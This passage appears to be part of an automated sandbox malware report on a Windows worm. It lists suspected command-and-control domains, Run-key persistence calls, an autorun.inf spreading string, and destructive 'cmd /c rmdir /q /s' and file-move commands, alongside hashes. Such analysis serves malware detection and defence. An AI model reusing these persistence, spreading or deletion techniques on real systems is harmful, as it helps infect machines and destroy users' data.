fgogogoo.info/$http://nousiieiffgogogoo.net/$http://nousiieiffgogogoo.ru/$http://nousiieiffgogogoo.su/$http://slpsrgpsrhojifdij.biz/$http://slpsrgpsrhojifdij.biz/$http://slpsrgpsrhojifdij.com/$http://slpsrgpsrhojifdij.in/$http://slpsrgpsrhojifdij.info/$http://slpsrgpsrhojifdij.net/$http://slpsrgpsrhojifdij.ru/$http://slpsrgpsrhojifdij.su/$http://srndndubsbsifurfd.biz/$http://srndndubsbsifurfd.biz/$http://srndndubsbsifurfd.com/$http://srndndubsbsifurfd.in/$http://srndndubsbsifurfd.info/$http://srndndubsbsifurfd.net/$http://srndndubsbsifurfd.ru/$http://srndndubsbsifurfd.su/$http://ssofhoseuegsgrfnj.biz/$http://ssofhoseuegsgrfnj.biz/$http://ssofhoseuegsgrfnj.com/$http://ssofhoseuegsgrfnj.in/$http://ssofhoseuegsgrfnj.info/$http://ssofhoseuegsgrfnj.net/$http://ssofhoseuegsgrfnj.su/$http://ssofhoseuegsgrfnu.ru/$m.exe$o.exe$p.exe$s.exe$t.exe$winsvcs.exe$x$x
API String ID: 2238563751-1929099517
Opcode ID: 24f9d2943bb522b9733b909b534f321aa1f7c089defa5e5c4731006e04a00fd0
Instruction ID: 998e279ab630b6434e1c0101dc3529ca0b686cab9416bf1021e7191076eb0e73
Opcode Fuzzy Hash: 24f9d2943bb522b9733b909b534f321aa1f7c089defa5e5c4731006e04a00fd0
Instruction Fuzzy Hash: 43923DB0A407699EEF20DF50DD49BDAB7B4FB04705F0080EAE249BA1D1C7B85A84CF59

Function 00403DB3 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 183
registrysleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00403DDB
memset.MSVCRT ref: 00403DF1
memset.MSVCRT ref: 00403E07
ExpandEnvironmentStringsW.KERNEL32(?,?,00000208), ref: 00403E28
_snwprintf.MSVCRT ref: 00403E46
_snwprintf.MSVCRT ref: 00403E6D
PathFileExistsW.KERNELBASE(?), ref: 00403E7C
PathFileExistsW.KERNELBASE(?), ref: 00403E91
CreateDirectoryW.KERNELBASE(?,00000000), ref: 00403EA4
CopyFileW.KERNELBASE(?,?,00000000), ref: 00403EBA
Sleep.KERNELBASE(000001F4), ref: 00403EDB
_snwprintf.MSVCRT ref: 00403F00
SetFileAttributesW.KERNELBASE(?,00000007), ref: 00403FB0
SetFileAttributesW.KERNELBASE(?,00000007), ref: 00403FBF
RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run\,00000000,000F003F,?), ref: 00403FDD
RegSetValueExW.KERNELBASE(?,?,00000000,00000001,?,?), ref: 0040405E
RegCloseKey.KERNELBASE(?), ref: 0040406A
RegOpenKeyExW.KERNELBASE(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,000F003F,?), ref: 00404088
RegSetValueExW.KERNELBASE(?,?,00000000,00000001,?,?), ref: 00404109
RegCloseKey.KERNELBASE(?), ref: 00404115
Sleep.KERNELBASE(000001F4), ref: 0040412D
ExitProcess.KERNEL32 ref: 00404135

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00403FD3
%ls\94000696690303050, xrefs: 00403E35
%ls:*:Enabled:%s, xrefs: 00403EEF
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040407E
%ls\%ls, xrefs: 00403E5C

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: File$_snwprintfmemset$AttributesCloseExistsOpenPathSleepValue$CopyCreateDirectoryEnvironmentExitExpandProcessStrings
String ID: %ls:*:Enabled:%s$%ls\%ls$%ls\94000696690303050$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
API String ID: 2527662941-1033523944
Opcode ID: aa45970d3a88e3b37704e50bb6eb27db35af4ab28b81ce86dd9b2f03af53a582
Instruction ID: f988062a3cac2b408eb3252422939997e0dc03c7f21b39b6b4153b48e23d4fb2
Opcode Fuzzy Hash: aa45970d3a88e3b37704e50bb6eb27db35af4ab28b81ce86dd9b2f03af53a582
Instruction Fuzzy Hash: 98812675A002699EDB20DB54CC49BDAB3B8FB08305F0041EAF649F6191EB749AD4CF99

Function 0040104E Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 0040107B
__p__fmode.MSVCRT ref: 00401090
__p__commode.MSVCRT ref: 0040109E
__setusermatherr.MSVCRT ref: 004010CA
_initterm.MSVCRT ref: 004010E0
__getmainargs.MSVCRT ref: 00401103
_initterm.MSVCRT ref: 00401113
GetStartupInfoA.KERNEL32(?), ref: 00401152
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00401176
exit.MSVCRT ref: 00401186
_XcptFilter.MSVCRT ref: 00401198

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 00cc109fcfa51d3a479abcbf0ee4ae0300f6ec2d69621d7ee967bf206d2d22e7
Instruction ID: 94e1e2716a1ba341fd62adcb868f80db46b7d294d77747727738e79ab16cead9
Opcode Fuzzy Hash: 00cc109fcfa51d3a479abcbf0ee4ae0300f6ec2d69621d7ee967bf206d2d22e7
Instruction Fuzzy Hash: C7415CB1940744AFDB249FA4DA45AAE7BB8FB09710F20013FE681BB2A1D6785845CF58

Function 0040206E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040207D
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,?), ref: 004020BC
Sleep.KERNEL32(000001F4,?,?,?), ref: 004020CF
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 004020E5

Strings

open, xrefs: 004020DE
D, xrefs: 0040208E

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: CreateExecuteProcessShellSleepmemset
String ID: D$open
API String ID: 541629773-2491301029
Opcode ID: 1addacf4efe8d5a76caaec790531cad723874f5d98d5e7504146ea4ebc39d0a5
Instruction ID: 244d5e96a176da2f0eb505dfe5489d13d208d1740a25dc0715168ccfed983adf
Opcode Fuzzy Hash: 1addacf4efe8d5a76caaec790531cad723874f5d98d5e7504146ea4ebc39d0a5
Instruction Fuzzy Hash: 1D015E71784348BAEB604BE4DD0AFDA7BB8AB08B00F100022F701BE0D0D6F5A0459B6E

Function 0040FCC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreatePen.GDI32(00000000), ref: 0040FD85
CreateFontIndirectA.GDI32(00000028), ref: 0040FDF4
GetSysColor.USER32(00000005), ref: 0040FE0C

Strings

dD, xrefs: 0040FE36
Taho, xrefs: 0040FDE8

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Create$ColorFontIndirect
String ID: Taho$dD
API String ID: 4251253423-4141250355
Opcode ID: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
Instruction ID: fcce034208925bc6aaa437948b4944f0ceb75c6593572307ad6557a4650ec99a
Opcode Fuzzy Hash: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
Instruction Fuzzy Hash: 1641C3B08053489FDB24CF1AC98478ABBE4FB49314F60866EE95C8B351C3758946CF95

Function 00429B0C Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00429B21

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
Instruction ID: 1759a15e84957c5be0338275ad0a4f9db10762a5021981fbe78d74647f587313
Opcode Fuzzy Hash: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
Instruction Fuzzy Hash: 08D05E7AA903456AEB009F76BC08B263BDCE385795F048436F80CC6190E674D9409E48

Function 02513894 Relevance: 1.5, APIs: 1, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 025138B7

Memory Dump Source

Source File: 00000000.00000002.2430093141.0000000002513000.00000040.00001000.00020000.00000000.sdmp, Offset: 02513000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2513000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
Instruction ID: bc46460c34015774e69b47f9b012ece61d5007231c2f20bde70a8b7c47af9205
Opcode Fuzzy Hash: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
Instruction Fuzzy Hash: 06E07E7590020CBFCF01DF94D94589DBBB5FB08200F008199ED54A6311D6719A20EF51

Function 02513904 Relevance: 1.5, APIs: 1, Instructions: 15
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 0251391E

Memory Dump Source

Source File: 00000000.00000002.2430093141.0000000002513000.00000040.00001000.00020000.00000000.sdmp, Offset: 02513000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2513000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
Instruction ID: 70e94ef0705d8944795f621bd3e68051894d38bfb04428e40e77bb417b00b24b
Opcode Fuzzy Hash: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
Instruction Fuzzy Hash: 75D04274D0020CAF8B00EFA8D54589CFBF5EB48200F1081AAEC04A7311E671AA50DF95

Function 0040FC5D Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InvalidateRect.USER32(?,00000000,00000001), ref: 0040FC62

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
Instruction ID: f450d144a2216a65e4146170c8b5550937e7e802fcbd3a1ddd5c57f0d0063f53
Opcode Fuzzy Hash: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
Instruction Fuzzy Hash: A6D05E786843029FE714DF20EC84FA633A8EB1A704F46053DE884D72A0D7789501CB5E

Function 02510570 Relevance: 1.3, APIs: 1, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02510593

Memory Dump Source

Source File: 00000000.00000002.2430093141.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction ID: f507c9e0af5433cc0cf830fa77d9dbd61e7dd57a332184dfc74cb6d1f31b766d
Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction Fuzzy Hash: 19E07E7590020CAFCF05DF98D94589DBBB5EB08310F00809AED14A6251D6319A60AF91

Function 02513854 Relevance: 1.3, APIs: 1, Instructions: 18
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02513877

Memory Dump Source

Source File: 00000000.00000002.2430093141.0000000002513000.00000040.00001000.00020000.00000000.sdmp, Offset: 02513000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2513000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction ID: 79c4ea91e5794106f116139b032c2486399267308026b207cdd2215700a35bdb
Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction Fuzzy Hash: 71E07E7590020CBFCF01DF94D94589DBBB5EB08210F00809AED14A6311D6719A20EF51

Function 02510540 Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 02510560

Memory Dump Source

Source File: 00000000.00000002.2430093141.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction ID: 437696f84bcd9f717dfd832ed1981901b84c8f2134922846c067bc9ff58d310f
Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction Fuzzy Hash: D8E09275D0020CEF8B04DF98C84589DBBB5EB08310F008099EC1497310D6319A60DF91

Function 02513824 Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 02513844

Memory Dump Source

Source File: 00000000.00000002.2430093141.0000000002513000.00000040.00001000.00020000.00000000.sdmp, Offset: 02513000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2513000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction ID: 4eff367930353053c63b0f322240209b5fddb5f359813d26538f13c8bcb82f78
Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction Fuzzy Hash: 4EE00275D0020CFF8F05DF94D94599DBBB5EB58210F108199ED14A7311D6719A60DF91

Function 02513764 Relevance: 1.3, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(?,?), ref: 02513781

Memory Dump Source

Source File: 00000000.00000002.2430093141.0000000002513000.00000040.00001000.00020000.00000000.sdmp, Offset: 02513000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2513000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
Instruction ID: 3c3d3c0a4a7d7ceb44e447619e682906e20eac0cd4d9887bbe492d8d6f9b5e74
Opcode Fuzzy Hash: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
Instruction Fuzzy Hash: EDE02D79D0020CBF8B41EFA8D54989CFBB5EB48210F1081AAEC58A7311E671AA64DF91

Non-executed Functions

Function 00402204 Relevance: 172.2, APIs: 67, Strings: 31, Instructions: 655sleepfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402211
srand.MSVCRT ref: 00402218
memset.MSVCRT ref: 0040222C
memset.MSVCRT ref: 00402242
memset.MSVCRT ref: 00402258
memset.MSVCRT ref: 0040226E
memset.MSVCRT ref: 00402284
memset.MSVCRT ref: 0040229A
_snwprintf.MSVCRT ref: 004022B6
_snwprintf.MSVCRT ref: 004022D5
_snwprintf.MSVCRT ref: 004022F1
_snwprintf.MSVCRT ref: 0040230D
_snwprintf.MSVCRT ref: 00402329
_snwprintf.MSVCRT ref: 00402345
Sleep.KERNEL32(000001F4), ref: 00402352
_wfopen.MSVCRT ref: 00402364
fseek.MSVCRT ref: 00402384
ftell.MSVCRT ref: 00402392
fclose.MSVCRT ref: 004023A4
SetFileAttributesW.KERNEL32(?,00000080), ref: 004023C4
DeleteFileW.KERNEL32(?), ref: 004023D1

Part of subcall function 00401000: wcsstr.MSVCRT ref: 00401009

Sleep.KERNEL32(000001F4), ref: 004023DC
PathFileExistsW.SHLWAPI(?), ref: 004023E9
PathFileExistsW.SHLWAPI(?), ref: 004023FE
SetFileAttributesW.KERNEL32(?,00000080), ref: 00402414
DeleteFileW.KERNEL32(?), ref: 00402421
Sleep.KERNEL32(000001F4), ref: 0040247D
SetFileAttributesW.KERNEL32(?,00000005), ref: 0040248C
Sleep.KERNEL32(000001F4), ref: 00402497
PathFileExistsW.SHLWAPI(?), ref: 004024A4
CreateDirectoryW.KERNEL32(?,00000000), ref: 004024B7
SetFileAttributesW.KERNEL32(?,00000007), ref: 004024CA
Sleep.KERNEL32(000001F4), ref: 004024D5
PathFileExistsW.SHLWAPI(?), ref: 004024E2
CopyFileW.KERNEL32(00408058,?,00000000), ref: 004024FA
SetFileAttributesW.KERNEL32(?,00000007), ref: 00402509
Sleep.KERNEL32(000001F4), ref: 00402514
PathFileExistsW.SHLWAPI(?), ref: 00402521
_wfopen.MSVCRT ref: 00402537
fprintf.MSVCRT ref: 00402558
fclose.MSVCRT ref: 00402565
SetFileAttributesW.KERNEL32(?,00000007), ref: 00402574
Sleep.KERNEL32(000001F4), ref: 0040257F
FindFirstFileW.KERNEL32(?,?), ref: 00402593
memset.MSVCRT ref: 00402774
_snwprintf.MSVCRT ref: 00402797
SetFileAttributesW.KERNEL32(?,00000080), ref: 004027AB
DeleteFileW.KERNEL32(?), ref: 004027B8
Sleep.KERNEL32(00000064), ref: 004027C0
PathFileExistsW.SHLWAPI(?), ref: 004027CD
memset.MSVCRT ref: 00402A7B
memset.MSVCRT ref: 00402A91
_snwprintf.MSVCRT ref: 00402AB4
_snwprintf.MSVCRT ref: 00402AD7
SetFileAttributesW.KERNEL32(?,00000080), ref: 00402AEB
PathFileExistsW.SHLWAPI(?), ref: 00402AF8
PathFileExistsW.SHLWAPI(?), ref: 00402B0D
GetFileAttributesW.KERNEL32(?), ref: 00402B22
memset.MSVCRT ref: 00402B6D
_snwprintf.MSVCRT ref: 00402B8D
ShellExecuteW.SHELL32(00000000,00000000,cmd.exe,?,00000000,00000000), ref: 00402BA9
DeleteFileW.KERNEL32(?), ref: 00402BB8
memset.MSVCRT ref: 00402BCC
_snwprintf.MSVCRT ref: 00402BF3
ShellExecuteW.SHELL32(00000000,00000000,cmd.exe,?,00000000,00000000), ref: 00402C0F
FindNextFileW.KERNEL32(?,?), ref: 00402C22
FindClose.KERNEL32(?), ref: 00402C36

Strings

.lnk, xrefs: 004027DB
%s\_\%ls, xrefs: 00402AC6
B:\, xrefs: 00402464
.pif, xrefs: 00402721
%ls*, xrefs: 004022A5
%ls\%s, xrefs: 00402786
.cmd, xrefs: 0040270A
%ls\%s, xrefs: 00402AA3
shell32.dll, xrefs: 00402438
.js, xrefs: 004026A6
autorun.inf, xrefs: 00402925
/c rmdir /q /s "%ls", xrefs: 00402B7C
cmd.exe, xrefs: 00402C06
.bat, xrefs: 0040268B
.jse, xrefs: 004026F3
.com, xrefs: 004026DC
B:\, xrefs: 0040243F
.scr, xrefs: 004026C1
.lnk, xrefs: 004025AF
%ls\_\DeviceManager.exe, xrefs: 00402318
.jar, xrefs: 00402738
%ls\autorun.inf, xrefs: 00402334
.dll, xrefs: 0040274F
shell32.dll, xrefs: 0040245D
%ls\%s.lnk, xrefs: 004022C4
[autorun]open=_\DeviceManager.exeUseAutoPlay=1, xrefs: 0040254D
%ls\_, xrefs: 004022FC
/c move /y "%ls", "%ls", xrefs: 00402BE2
.vbs, xrefs: 00402670
cmd.exe, xrefs: 00402BA0
%ls.lnk, xrefs: 004022E0

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: File$_snwprintfmemset$Attributes$ExistsPathSleep$Delete$Find$ExecuteShell_wfopenfclose$CloseCopyCountCreateDirectoryFirstNextTickfprintffseekftellsrandwcsstr
String ID: %ls*$%ls.lnk$%ls\%s$%ls\%s$%ls\%s.lnk$%ls\_$%ls\_\DeviceManager.exe$%ls\autorun.inf$%s\_\%ls$.bat$.cmd$.com$.dll$.jar$.js$.jse$.lnk$.lnk$.pif$.scr$.vbs$/c move /y "%ls", "%ls"$/c rmdir /q /s "%ls"$B:\$B:\$[autorun]open=_\DeviceManager.exeUseAutoPlay=1$autorun.inf$cmd.exe$cmd.exe$shell32.dll$shell32.dll
API String ID: 2559639764-1539354289
Opcode ID: 9fd6b95f88017d7aafe40e09fdf6497051582b889d73354437b157aed1dca1b3
Instruction ID: 5f2da63774f396e0844ffffcdcfe84a10227647eb49c82ee01ce1ef595922f0a
Opcode Fuzzy Hash: 9fd6b95f88017d7aafe40e09fdf6497051582b889d73354437b157aed1dca1b3
Instruction Fuzzy Hash: 85426F75A00219AADF20AB60DD49FDA73B8BB04744F5040FAF509F61D1EBB89AC48F58

Function 00417F80 Relevance: 74.6, APIs: 41, Strings: 1, Instructions: 1100stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00423750: RtlInitializeCriticalSection.NTDLL(?), ref: 00423790

RtlEnterCriticalSection.NTDLL(?), ref: 00418016
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00418062
GetModuleFileNameA.KERNEL32(0044B308,?,00000104), ref: 0041808A
lstrlen.KERNEL32(?), ref: 004180DE
_malloc.LIBCMT ref: 00418155
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000400,80070057), ref: 004181D7
GetModuleHandleA.KERNEL32(00000000), ref: 00418226
lstrlenW.KERNEL32(?), ref: 0041825A
_memcpy_s.LIBCMT ref: 00418278
lstrlenW.KERNEL32(00000400), ref: 0041828F

Part of subcall function 00418DF0: RtlEnterCriticalSection.NTDLL(00000000), ref: 00418E1D
Part of subcall function 00418DF0: lstrlenW.KERNEL32(00000000), ref: 00418E26
Part of subcall function 00418DF0: _malloc.LIBCMT ref: 00418E87
Part of subcall function 00418DF0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000000,000000FF,?,-00000002,00000000,00000000,80070057), ref: 00418EE8
Part of subcall function 00418DF0: RtlLeaveCriticalSection.NTDLL(00000000), ref: 00418F0D

lstrlen.KERNEL32(00000000), ref: 004182F5
_malloc.LIBCMT ref: 00418358
MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,-00000002), ref: 004183AF
RtlEnterCriticalSection.NTDLL(?), ref: 0041841D
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0041846D
RtlEnterCriticalSection.NTDLL(?), ref: 004184A7
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004184F1
RtlLeaveCriticalSection.NTDLL(?), ref: 00418577
RtlDeleteCriticalSection.NTDLL(?), ref: 0041858D
RtlLeaveCriticalSection.NTDLL(?), ref: 0041865D
RtlDeleteCriticalSection.NTDLL(?), ref: 00418673
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004186BB
RtlLeaveCriticalSection.NTDLL(?), ref: 00418741
RtlDeleteCriticalSection.NTDLL(?), ref: 00418757
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0041879D
RtlEnterCriticalSection.NTDLL(?), ref: 00418814
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0041885C
RtlLeaveCriticalSection.NTDLL(?), ref: 004188AC
RtlDeleteCriticalSection.NTDLL(?), ref: 004188C2
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0041890A
RtlLeaveCriticalSection.NTDLL(?), ref: 00418A43
RtlDeleteCriticalSection.NTDLL(?), ref: 00418A59
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00418A9F
RtlLeaveCriticalSection.NTDLL(?), ref: 00418BD7
RtlDeleteCriticalSection.NTDLL(?), ref: 00418BF9
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00418C49
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004185D5

Part of subcall function 0042592A: __lock.LIBCMT ref: 00425948
Part of subcall function 0042592A: ___sbh_find_block.LIBCMT ref: 00425953
Part of subcall function 0042592A: ___sbh_free_block.LIBCMT ref: 00425962
Part of subcall function 0042592A: HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
Part of subcall function 0042592A: GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3

RtlEnterCriticalSection.NTDLL(?), ref: 004189AF
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004189F5
RtlEnterCriticalSection.NTDLL(?), ref: 00418B17
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00418B67

Strings

0D, xrefs: 00418B0F

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: CriticalSection$ExceptionRaise$EnterLeave$Delete$lstrlen$ByteCharMultiWide_malloc$Module$ErrorFileFreeHandleHeapInitializeLastName___sbh_find_block___sbh_free_block__lock_memcpy_s
String ID: 0D
API String ID: 1591215200-130544292
Opcode ID: becea20ee48cb570bfbf64149fdab0a5b5000b6fcafa99568f2fc40819b3f4fd
Instruction ID: f694174c2737caa7e057af72c37f0ceb9df478b8584e4924881f72b369627430
Opcode Fuzzy Hash: becea20ee48cb570bfbf64149fdab0a5b5000b6fcafa99568f2fc40819b3f4fd
Instruction Fuzzy Hash: AC82E072E01128ABDF10DBA5E844BDFB7B5BF44314F14816AE804B7341EB79AD81CB99

Function 004032A4 Relevance: 52.7, APIs: 20, Strings: 10, Instructions: 205sleepfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004032BF
memset.MSVCRT ref: 004032D5
FindFirstFileW.KERNEL32(*.*,?), ref: 004032E9
SetCurrentDirectoryW.KERNEL32(?), ref: 0040332A

Part of subcall function 004032A4: SetCurrentDirectoryW.KERNEL32(00406BD4), ref: 0040333F
